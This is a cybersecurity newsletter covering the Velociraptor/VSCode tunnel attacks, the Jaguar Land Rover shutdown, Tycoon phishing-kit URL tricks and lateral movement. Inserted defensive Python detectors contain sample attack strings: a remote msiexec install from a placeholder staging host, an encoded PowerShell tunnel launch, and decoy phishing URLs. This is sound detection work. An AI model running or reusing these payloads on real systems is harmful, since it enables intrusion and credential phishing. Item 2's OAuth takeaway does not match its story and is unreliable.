
CYBERCRIMINALS ARE ALREADY IN YOUR SERVERS... DO YOU THINK YOU'RE PROTECTED?

🎖️ Field Report – Digital Front, Sector 2025, Code Red: Infiltration Confirmed. One thing is now certain: the enemy is already inside. The lines of defense held... for a time. Firewalls, EDR, network segmentation: everything was in place. And yet, in the darkness of the datacenter, between two Docker containers, it slipped through. Silently. Efficiently.


🤖 Dear internet users and fellow Cyberdefenders,

Cybercriminals no longer try to force the doors. They bypass them. They exploit our tools, speak our language, use our own systems against us. 

A Velociraptor here, a hijacked Visual Studio Code there. Nothing abnormal at first glance… until production stops. Until the indicators go haywire. Until the digital silence becomes deafening. 

In 2025, the battlefield has changed. The enemy is methodical, patient, organized. They infiltrate, observe, then strike—often without warning. 

Like in Halewood, at Jaguar Land Rover, or in the clouds of Asia where east-west traffic has become their favorite playground. But all is not lost. 

In this tactical briefing, you will discover how:

  • Modern SOCs now track internal movements;

  • Phishing is adapting to the habits of Teams and your employees;

  • Startups like NexaTrace are changing the game in the digital fight.

🎙️ Mobilize your units. Train your analysts. And above all, open your eyes. Because the enemy is no longer at the gate. They are in your systems. 

Do you want to survive in this world? Then read to the end. And stay alert.

Highlights:

👉 Swiss Post Cybersecurity sounds the alarm: hacking is inevitable 🔐 

👉 Hackers hijack Visual Studio Code to open invisible C2 tunnels 🕳️

👉 Jaguar Land Rover paralyzed: when cyber sabotage halts production 🏭

👉 Phishing 2.0: the Tycoon kit and its impossible-to-detect links 🎯

👉 Are your servers hiding a silent intruder? East-West traffic in the spotlight 🕵️


🗞️ Guess what?

  • Paul Such of Swiss Post Cybersecurity emphasizes that the paradigm has shifted: you must now assume an intrusion is inevitable. SMEs and large corporations alike must adopt rigorous digital hygiene and measure the effectiveness of their cybersecurity efforts.  

  • Attackers are exploiting the Velociraptor tool to establish C2 tunnels via Visual Studio Code. They abuse legitimate open-source tools to bypass detection systems, while relying on Cloudflare Workers for staging.  

  • Jaguar Land Rover suffered a major cyberattack, forcing a production shutdown. Although customer data exfiltration has not been confirmed, the scale of the sabotage underscores the growing threat of attacks targeting operational infrastructure.  

  • The Tycoon Phishing-as-a-Service kit introduces new URL obfuscation techniques, making links nearly undetectable. Methods like redundant protocols or the injection of invisible characters defy traditional filters.  

  • East-west traffic is becoming the preferred entry point for APTs. With the explosion of microservices and the cloud, internal blind spots are multiplying. This lack of lateral visibility is exploited to move discreetly between servers and critical systems.


🤓 Would you like to know more?

1️⃣ Swiss Post Cybersecurity sounds the alarm: hacking is inevitable

Summary: Paul Such, CEO of Swiss Post Cybersecurity, reflects on two decades of evolution in the cybersecurity field. According to him, 2025 marks a turning point: all companies, regardless of their size, must adopt an assume breach posture. SMEs remain particularly vulnerable, often ill-prepared or poorly advised. The growing complexity of attacks, especially those targeting IT suppliers, demands heightened vigilance. Swiss Post Cybersecurity positions itself as a key player, offering services that cover the entire spectrum: consulting, monitoring, incident response, and strategic support.

Details:

  • Evolution of the cyber paradigm: The "assume breach" approach redefines cyber strategy: the goal is no longer to prevent a hypothetical intrusion, but to organize resilience around a compromise considered a given. This implies a profound cultural shift, particularly within SMEs.  

  • SMEs on the front line: Lack of resources, absence of strategy, reliance on underqualified providers… French-speaking Swiss SMEs are ideal targets. Paul Such advocates for a practical, pragmatic cybersecurity approach adapted to their reality.  

  • Supply chain: the systemic Achilles' heel: Rebound attacks via IT suppliers are becoming the norm. Regularly assessing the cyber maturity of partners is becoming as critical as evaluating their financial health or GDPR compliance.  

  • Pressure from boards of directors: A strong new trend: management now demands clear KPIs for cybersecurity (response time, patching rates, blocked incidents, etc.). The CISO can no longer get by with technical jargon alone.  

  • Swiss Post Cybersecurity: sovereignty and national coverage: The Swiss entity positions itself as a 100% Swiss trusted third party, combining local intervention, a broad spectrum of skills, and independence from US giants.

What should be remembered?

Adopting a proactive posture is not just a technical necessity but a strategic imperative. The assume breach paradigm requires considering infiltration as inevitable and organizing defenses accordingly. This involves culture, budget, metrics, and management involvement. 

 —————————————————————————

2️⃣ Hackers hijack Visual Studio Code to open invisible C2 tunnels

Summary: An attacker group has innovated by hijacking the open-source forensic tool Velociraptor to establish command and control (C2) channels using Visual Studio Code. This attack relies on legitimate components, allowing it to bypass many traditional protections. Using Cloudflare infrastructure, the attackers deploy malicious MSIs and encoded PowerShell scripts to achieve remote execution. Sophos warns: this type of activity should be considered a precursor to ransomware. Companies are urged to monitor unauthorized use of open-source tools and strengthen their behavioral detection.

Details:

  • Living-off-the-Land 2.0: Using legitimate tools like Velociraptor and VSCode allows attackers to operate without triggering alerts. This approach is part of an advanced strategy for persistence and evasion.

  • Hijacked cloud infrastructure: Cloudflare Workers, often considered neutral, becomes an operational staging point here. The attack thus bypasses classic protections through the apparent innocence of the traffic flows.

  • Offensive use of msiexec: Microsoft's standard tool, present on every machine, is used to inject payloads. This helps avoid suspicious executables or abnormal behaviors detected by EDR.

  • Encoded PowerShell command: The attack relies on obfuscated PowerShell scripts to download and execute VSCode with the tunnel flag active—a completely repurposed but effective use for C2.

  • Precursor to ransomware: The observed activity is not a final objective but a reconnaissance and preparation phase for a more destructive attack. Sophos recommends interpreting this type of pattern as a critical weak signal.
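Detection logic for the chain described in the list above, added here as an example; it is not code from Sophos or from this newsletter. It runs over constructed process-creation events, decodes `-EncodedCommand` payloads before matching (so the `code tunnel` launch hidden inside the encoded script is seen), and flags a host only when a staging step and a tunnel launch both appear. The event shape and the Velociraptor host allowlist are assumptions.

```python
import base64
import re

# Constructed (host, image, command line) events in the shape of normalised Sysmon/EDR data.
SAMPLE_EVENTS = [
    ("ws-17", "msiexec.exe", "msiexec.exe /i https://stager.example.workers.dev/setup.msi /qn"),
    ("ws-17", "powershell.exe", "powershell.exe -nop -w hidden -enc " + base64.b64encode(
        "& 'C:\\Program Files\\VSCode\\code.exe' tunnel".encode("utf-16-le")).decode()),
    ("ws-17", "code.exe", "code.exe tunnel --accept-server-license-terms --name ws-17"),
    ("ws-17", "velociraptor.exe", "velociraptor.exe --config client.config.yaml client"),
    ("srv-dfir", "velociraptor.exe", "velociraptor.exe --config client.config.yaml client"),
    ("ws-03", "powershell.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
]

# Hosts where the Velociraptor client is legitimately deployed (assumed allowlist).
EXPECTED_VELOCIRAPTOR_HOSTS = {"srv-dfir"}

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
TUNNEL = re.compile(r"\bcode(?:\.exe|\.cmd)?['\"]?\s+tunnel\b", re.I)

def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Detection names triggered by one event; encoded scripts are inspected decoded."""
    host, image, cmd = event[0], event[1].lower(), event[2]
    hits = []
    if image == "msiexec.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("msiexec_remote_install")          # MSI pulled from a remote staging host
    if image == "powershell.exe":
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            hits.append("encoded_powershell")
            cmd = decoded                                # match on what actually executes
    if TUNNEL.search(cmd):
        hits.append("vscode_tunnel_launch")              # VSCode started in tunnel mode
    if image == "velociraptor.exe" and host not in EXPECTED_VELOCIRAPTOR_HOSTS:
        hits.append("velociraptor_on_unexpected_host")
    return hits

def hosts_with_precursor_chain(events):
    """Hosts showing both a staging step (remote MSI / encoded PS) and a tunnel launch."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev[0], set()).update(classify(ev))
    return sorted(h for h, s in per_host.items() if "vscode_tunnel_launch" in s
                  and s & {"msiexec_remote_install", "encoded_powershell"})
```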

What should be remembered?

This attack demonstrates that SaaS integrations can become backdoors. Companies must strengthen their OAuth token management, segment access, and actively monitor their API logs.

 ——————————————————————

3️⃣ Jaguar Land Rover paralyzed: when cyber sabotage halts production

Summary: Jaguar Land Rover (JLR) has suffered a major cyberattack that has paralyzed its production and sales activities. Although the company claims that customer data has not been compromised, the immediate reaction—a complete shutdown of systems—shows the severity of the incident. Experts believe the attack targeted industrial systems (OT). This type of threat, often linked to ransomware, highlights the vulnerability of large companies at the intersection of the digital and physical worlds. The incident occurs in a tense economic context for JLR, which is already facing revenue declines and production delays.

Details:

  • Sudden shutdown, an indicator of severity: The immediate suspension of production operations suggests an attack targeting critical OT or ERP systems. Few incidents cause a complete shutdown without damage already being underway.  

  • Strategic interruption during a sales period: The incident occurs at a key moment for dealerships (launch of the 75 registration plate), directly impacting sales and cash flow. The timing of the attack is likely not a coincidence.  

  • Vague investigation, minimal communication: The ambiguity surrounding the origin of the attack and the refusal to confirm or deny ransomware are fueling speculation. In March, the Hellcat group claimed responsibility for a breach at JLR.  

  • HR and reputational impacts: JLR is already undergoing an internal restructuring phase with 500 job cuts. This incident could affect its employer brand and the trust of industrial partners.  

  • Signs of a targeted sabotage?: The rapid propagation suggested by the complete shutdown could indicate a deep compromise, or even a supply chain attack affecting multiple sites simultaneously.

What should be remembered?

Attacks on critical infrastructure illustrate the paradigm shift in industrial cybersecurity. It is no longer just data, but production capabilities themselves that are becoming the primary target.

 ——————————————————————

4️⃣ Phishing 2.0: the Tycoon kit and its impossible-to-detect links

Summary: The Tycoon phishing-as-a-service kit is innovating with obfuscation techniques that trick both users and automated filters. The manipulation of URLs via invisible characters, redundant protocols, or deceptive subdomains makes attacks almost undetectable. Tycoon also relies on lure pages with CAPTCHAs to gain victims' trust. Barracuda and Keepnet note an explosion of these attacks, particularly via Microsoft 365 and documents embedding malicious QR codes. Phishing remains the main entry point for cyberattacks and is evolving faster than traditional protections.

Details:

  • Next-generation URL camouflage: Tycoon uses sequences of invisible characters (e.g., %20, Unicode) to conceal the true destination of the link, thus evading traditional URL filters.  

  • Multi-strategy social engineering: Campaigns include fake IT support on Teams, fake CAPTCHA pages, and credible pretexts (maintenance, ticket, M365) to encourage interaction.  

  • Protocol redundancy attacks: Links integrate multiple HTTP prefixes or addresses with "@" symbols, where the displayed domain is just a decoy. The user is redirected to a hidden malicious domain.  

  • Explosion of malicious QR codes: Used in 83% of infected documents (PDF, Office), they bypass email protections, especially on mobile where URL visibility is limited.  

  • Self-service PhaaS: Tycoon offers ready-to-use templates, tracking dashboards, and regular updates to its evasion techniques. Phishing is becoming a turnkey industry.  
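A defender-side check for the URL tricks listed above (invisible Unicode characters, `%20` padding, stacked `https://` prefixes, `brand@real-host` decoys, and brand names planted in a subdomain), added here as an example; it is not code from the Barracuda or Keepnet research. The brand list and the sample URLs are constructed for the example; the "effective host" is the heuristic of parsing from the last scheme prefix, which is how the decoy part gets discarded.

```python
import re
import unicodedata
from urllib.parse import unquote, urlsplit

# Brand domains a lure is likely to imitate (assumed list for this example).
BRAND_DOMAINS = ("microsoftonline.com", "microsoft.com", "office.com", "sharepoint.com")

def strip_invisible(text):
    """Drop Unicode format characters (zero-width space, soft hyphen, BOM ...)."""
    return "".join(c for c in text if unicodedata.category(c) != "Cf")

def effective_host(url):
    """Host the link really leads to: parse from the LAST scheme prefix, so a
    decoy 'https://brand@' userinfo or a stacked 'https://https://' is discarded."""
    tail = url
    for m in re.finditer(r"https?://", url, re.I):
        tail = url[m.start():]
    return (urlsplit(tail).hostname or "").lower()

def url_red_flags(raw):
    """Return (sorted flag names, effective host) for one URL string."""
    flags = set()
    decoded = unquote(raw)                     # surface %XX-encoded tricks as well
    cleaned = strip_invisible(decoded)
    if cleaned != decoded:
        flags.add("invisible_characters")      # zero-width / format characters inside the URL
    if re.search(r"\s{3,}", cleaned):
        flags.add("padding_whitespace")        # runs of %20 push the real target out of view
    if len(re.findall(r"https?://", cleaned, re.I)) > 1:
        flags.add("redundant_protocol")        # 'https://https://...' style prefixes
    if "@" in urlsplit(cleaned).netloc:
        flags.add("userinfo_decoy")            # displayed 'domain' is only the userinfo part
    host = effective_host(cleaned)
    if any(b in host and host != b and not host.endswith("." + b) for b in BRAND_DOMAINS):
        flags.add("brand_in_subdomain")        # brand.com.attacker.example
    return sorted(flags), host

# Constructed sample links (attacker hosts are placeholders under .example).
SAMPLE_URLS = [
    "https://login.microsoftonline.com/common/oauth2",
    "https://login.microsoftonline.com@evil-phish.example/login",
    "https://https://evil-phish.example/m365",
    "https://evil-phish.example/\u200b\u200bsignin",
    "https://evil-phish.example/%20%20%20%20signin",
    "https://microsoftonline.com.evil-phish.example/login",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(url_red_flags(u))
```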

What should be remembered?

Tycoon illustrates the professionalization of phishing, now sold as an accessible service. The speed at which these tactics evolve requires constant renewal of awareness and detection strategies.  

5️⃣ Are your servers hiding a silent intruder? East-West traffic in the spotlight

Summary: While most companies focus on perimeter security (north-south traffic), modern attacks exploit internal east-west traffic to spread discreetly. Known as "lateral movement," this phenomenon was responsible for over 80% of intrusions in APAC in 2024. The LockBit attack against the Indonesian government illustrates the damage an undetected intruder can cause. The lack of visibility into these internal movements constitutes a critical blind spot. The solution lies in deep observability: combining network telemetry with logs for enhanced real-time visibility.

Details:

  • Mutation of the defensive perimeter: The growing volume of east-west traffic in cloud-native architectures makes any defense focused solely on inbound/outbound flows obsolete.  

  • Blind spots exploited by APTs: Advanced attackers exploit the operational latency of SOCs in correlating internal events. Lateral movement becomes invisible without intra-infrastructure network visibility.  

  • Insufficient and ephemeral logs: Disabled agents, corrupted or overloaded logs… noise masks the weak signals. Only raw traffic (packets) provides an unalterable trace of malicious actions.  

  • Controlled decryption of internal flows: New technologies allow for the inspection of internal TLS traffic without compromising confidentiality or performance, making weak signals hidden in SSL tunnels visible.  

  • Convergence with Zero Trust: Deep observability helps validate segmentation policies, detect behavioral deviations, and feed adaptive controls—a cornerstone of the Zero Trust model.

What should be remembered?

Not seeing what is happening between internal systems is like letting the enemy roam freely. East-west visibility is becoming the foundation of a resilience strategy against modern threats.  

⚙️ Digital Combat Ops

🦾 Real-time security — How a SIEM transforms your SOC into an operational control tower

A SIEM (Security Information and Event Management) is a cybersecurity solution that centralizes, analyzes, and correlates event logs from network devices, servers, applications, and security systems in real time. 

It enables threat detection, alerts SOC teams, and facilitates a rapid response in case of an incident. Thanks to its dynamic dashboards and reporting functions, it provides comprehensive visibility into the IT environment, which is essential for continuous monitoring, risk management, and regulatory compliance. 

The SIEM identifies abnormal activities via correlation rules and, in its modern versions, integrates artificial intelligence and machine learning to refine detection and reduce false positives. 

It thus becomes a strategic pillar for an organization's cybersecurity posture, facilitating proactive monitoring, incident response, and security management at the enterprise level.
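One concrete correlation rule of the kind the SIEM description above refers to, applied to the east-west blind spot discussed in item 5: flow telemetry (who talks to whom on SMB/RDP/WinRM) is joined with authentication logs, and an alert fires when a host fans out to several internal hosts outside its learned baseline with confirmed logons. This is an added example, not code from the newsletter or from any SIEM vendor; the flow records, logon events, baseline and thresholds are all constructed for it.

```python
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_PORTS = {445, 3389, 5985}        # SMB, RDP, WinRM: the usual lateral-movement channels
WINDOW = timedelta(minutes=10)
FANOUT_THRESHOLD = 3                   # distinct new hosts before we alert
T = datetime.fromisoformat

# Constructed east-west flow records (ts, src, dst, dport) from packet/NetFlow telemetry.
FLOWS = [
    (T("2025-09-08T02:14:05"), "ws-17", "fs-01", 445),
    (T("2025-09-08T02:15:10"), "ws-17", "srv-01", 445),
    (T("2025-09-08T02:15:40"), "ws-17", "srv-02", 445),
    (T("2025-09-08T02:16:02"), "ws-17", "srv-03", 5985),
    (T("2025-09-08T02:16:30"), "ws-17", "dc-01", 3389),
    (T("2025-09-08T02:17:00"), "ws-17", "web-02", 443),
    (T("2025-09-08T09:00:00"), "adm-01", "srv-01", 5985),
    (T("2025-09-08T09:01:00"), "adm-01", "srv-02", 5985),
]
# Constructed network-logon outcomes (ts, src, dst, user, success), e.g. Windows 4624/4625 type 3.
LOGONS = [
    (T("2025-09-08T02:15:11"), "ws-17", "srv-01", "svc_backup", True),
    (T("2025-09-08T02:15:41"), "ws-17", "srv-02", "svc_backup", True),
    (T("2025-09-08T02:16:03"), "ws-17", "srv-03", "svc_backup", True),
    (T("2025-09-08T02:16:31"), "ws-17", "dc-01", "svc_backup", False),
    (T("2025-09-08T09:00:01"), "adm-01", "srv-01", "adm.jane", True),
    (T("2025-09-08T09:01:01"), "adm-01", "srv-02", "adm.jane", True),
]
# Peers each host normally reaches on admin ports (assumed learned baseline).
BASELINE_PEERS = {"ws-17": {"fs-01"}, "adm-01": {"srv-01", "srv-02", "srv-03"}}

def correlate_lateral_movement(flows, logons, baseline, window=WINDOW, threshold=FANOUT_THRESHOLD):
    """Alert when one host opens admin-port sessions to >= threshold internal hosts outside
    its baseline within `window`, each confirmed by a successful logon within 60 s."""
    confirmed = defaultdict(list)                       # src -> [(ts, dst, user)]
    for ts, src, dst, port in flows:
        if port not in ADMIN_PORTS or dst in baseline.get(src, set()):
            continue                                    # not an admin channel, or a known peer
        for lts, lsrc, ldst, user, ok in logons:
            if ok and (lsrc, ldst) == (src, dst) and abs(lts - ts) <= timedelta(seconds=60):
                confirmed[src].append((ts, dst, user))  # flow backed by an authenticated session
                break
    alerts = []
    for src, hits in confirmed.items():
        hits.sort()
        for start, _, user in hits:                     # slide the window over confirmed hops
            in_window = [h for h in hits if start <= h[0] <= start + window]
            hosts = sorted({h[1] for h in in_window})
            if len(hosts) >= threshold:
                alerts.append({"src": src, "user": user, "hosts": hosts, "start": start})
                break
    return alerts
```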

LIEUTENANT’S REPORT 🏆

Tenable: The commander-in-chief of vulnerability management on all fronts

Tenable, based in Columbia, Maryland (USA), is one of the global leaders in vulnerability management and attack surface reduction. Founded in 2002 and listed on Nasdaq (TENB), the company employs approximately 1,500 people and generates nearly $800 million in annual revenue. It offers a comprehensive portfolio of solutions including cloud security, Active Directory security, patch management, vulnerability detection, and Breach and Attack Simulation (BAS).  

Noteworthy:

Tenable stands out for its integrated approach centered on the visibility of real risks. In 2025, the vendor was once again recognized in eSecurity Planet's top 10 provider ranking, thanks to its advanced capabilities in correlating vulnerabilities, critical assets, and active threats. Its flagship tool, Tenable One, is particularly valued by large corporations for its ability to unify vulnerability management across multiple environments (on-prem, cloud, IT/OT). The company does not just identify flaws: it also offers prioritization based on business context, making it a true strategic ally for CISOs.

CYBERTRIVIA - DID YOU KNOW? 🤔

Without an attack, without malware, without an alert: the other face of cloud cyberespionage

Did you know that an attacker can spy on the network activity of a public cloud… without ever triggering an alert?

A study by security researchers revealed that some misconfigured cloud services allowed a malicious actor to deploy passive sensors to monitor internal data flows, without exploiting any known vulnerability. 

In some cases, simply subscribing to the same cloud provider as the target was enough to intercept network metadata or identify the internal IP addresses being used. 

The result: weeks of stealthy espionage, with no direct intrusion or malicious files. It is a brutal demonstration of a simple principle: just because it's in the cloud doesn't mean it's invisible.

Which strategy is most effective for detecting a lateral threat that is not visible at the perimeter?



"This is for all the newcomers: I have only one rule. Everyone fights. No one quits."